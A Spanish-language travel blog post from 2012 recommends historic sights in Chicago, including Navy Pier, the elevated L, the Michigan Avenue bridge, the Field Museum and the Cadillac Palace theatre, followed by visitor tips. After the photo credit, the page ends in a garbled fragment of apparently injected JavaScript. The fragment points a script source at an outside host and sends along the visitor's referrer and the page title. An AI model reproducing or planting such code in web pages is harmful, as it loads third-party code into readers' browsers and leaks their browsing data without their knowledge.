Esto también es Chicago

19/07/2012

¿Sabor antiguo en Chicago? Sí, es posible. La llamada ciudad del viento asusta con su Sears Tower, rascacielos emblemático, y su Cloud Gate, esa enorme alubia que distorsiona las imágenes. Con todo, no es complicado encontrar en este enclave puramente americano lugares pegados a la tierra y con un encanto histórico, en las antípodas de lo futurista. Cierre los ojos. Esto también es Chicago.

Navy Pier. Es uno de esos lugares que se te enganchan al corazón. El Navy Pier de Chicago es un muelle donde se ubica un antiguo parque de atracciones con una noria que es la réplica de la primera que existió aquí. Tampoco se podrá perder los tiovivos y los barcos clásicos que surcan el lago Michigan. El blues que tocan los músicos callejeros le terminarán de transportar a principios del siglo XX.

Metro de Chicago. Aquí todo el mundo lo llama L, de Elevated, ya que muchos de los tramos están elevados sobre las calles. Sitúese bajo los raíles y contemple la arquitectura de hierro y madera del segundo suburbano más antiguo de Estados Unidos, cuyas primeras estaciones datan de 1892.  Antes que usted, aquí estuvieron los gangsters y los mafiosos de Al Capone.

Puente de Michigan Avenue. Sus materiales son nobles (mármol y piedra) y uno puede llegar a imaginarse cómo era esta ciudad en 1920, cuando el puente se abrió al tráfico. El fresco del río Chicago nos da en la cara y nos entretenemos con los relieves que cuentan la historia de la ciudad. El Michigan Boulevard completa el paseo con sus rascacielos históricos.

The Field Museum. El perfil de Susy, la tiranosaurio rex expuesta al público más grande del mundo, asusta ya en la entrada. Esto empieza bien. El resto del museo le dejará encantado con sus salas dedicadas a Egipto, la historia del continente americano y los animales disecados. Es recomendable ir con tiempo y pasar allí unas cuantas horas. Los niños se lo pasarán en grande. El edificio, por su parte, bebe de la tradición dieciochesca.

Cadillac Palace. Que no despisten las luces. Este gran cartel en la fachada de un edificio con ventanas alineadas esconde un precioso teatro inaugurado en 1926 como sala vodevil. Hoy tiene una programación de primer nivel, así que una buena idea es acudir a alguna representación y admirar la rica arquitectura interior, inspirada en el barroco de Versalles. Todo es recargado y está decorado con minuciosidad. No creerá que pueda estar en Chicago.

Datos útiles:

  • Chicago es la tercera ciudad de Estados Unidos y tiene más de 3 millones de personas, casi diez con su área metropolitana.
  • El clima es continental: temperaturas bajo cero en invierno y mucho calor en verano.
  • Como siempre cuando se viaja a Estados Unidos, previamente hay que rellenar un cuestionario vía online para acceder sin problemas como turista al país: https://esta.cbp.dhs.gov.
  • Las propinas son voluntarias, pero es costumbre dejar entre un 15 y un 20% de la consumición.
  • La moneda es el dólar.
  • Iberia ofrece vuelos directos a Chicago desde Madrid, con una frecuencia de 5 a 7 vuelos directos semanales dependiendo de la época. Para encontrar los mejores precios, busque en www.iberia.com marcando “soy flexible en fechas”.

Foto | ShutterRunners.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;